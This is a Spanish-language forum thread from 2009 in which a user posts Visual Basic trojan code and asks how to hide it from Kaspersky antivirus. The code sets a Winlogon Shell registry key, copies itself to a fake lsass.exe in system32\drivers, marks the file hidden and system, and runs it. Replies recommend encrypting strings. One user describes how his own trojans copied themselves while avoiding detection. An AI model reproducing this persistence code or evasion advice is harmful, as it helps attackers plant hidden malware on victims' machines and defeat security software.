Indetectabilizar unas lineas en vb

demoniox12 · 4 Marzo 2009, 15:51 PM

Buenas,

el pedazo de codigo que detecta es:

Reg_Crea_KeyConValor HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe, " & Environ("WinDir") & "\system32\drivers\lsass.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WinDir") & "\system32\drivers\lsass.exe" 'lo copiamos
SetAttr Environ("WinDir") & "\system32\drivers\lsass.exe", vbHidden + vbReadOnly + vbSystem
DoEvents
Shell Environ("WinDir") & "\system32\drivers\lsass.exe" 'y lo ejecutamos

Les digo las combinaciones que detecta:

cuando FileCopy no esta no lo detecta, cuando reg_crea_keyconvalor y shell no estan tampoco lo detecta, cuando solo le cambio el nombre al FileCopy digamos le cambio el lsass no lo detecta, intente ponerlo en funcion para que saque de ahi el nombre, tambien intente ponerlo con strreverse.. nadap.. alguna solucion?

Saludos!

PD: el Antivirus es el Kaspersky

Karcrack · 4 Marzo 2009, 22:14 PM

Que tal si encriptas las cadenas?

Citar[KPC], cifra tus proyectos en VB

Saludos

Tengu · 5 Marzo 2009, 17:08 PM

asi es, deberias buscar en google, una funcion para cifrar strings
Igualmente en este foro recuerdo haer posteado algo asi. dejame ver...

vivachapas · 5 Marzo 2009, 19:08 PM

te digo lo q yo hacia en mis troyanos...

para q se copien a otra carpeta.. no usaba filecopy xq tb me lo detectaba... lo habria en una cadena a si mismo.. creaba el archivo en otra carpeta... y cerraba el archivo... luego lo ejecutaba al nuevo archivo.. este esperaba 10 seg a q el otro termine y se cierre.. lo buscaba y lo borraba...

luego para el regedit simplemente encriptaba el texto plano y ya no te lo detecta

SALUDOS

demoniox12 · 6 Marzo 2009, 16:43 PM

Muchas gracias muchachos!

Saludos!

Test Foro de elhacker.net SMF 2.1

Indetectabilizar unas lineas en vb

demoniox12

Karcrack

Tengu

vivachapas

demoniox12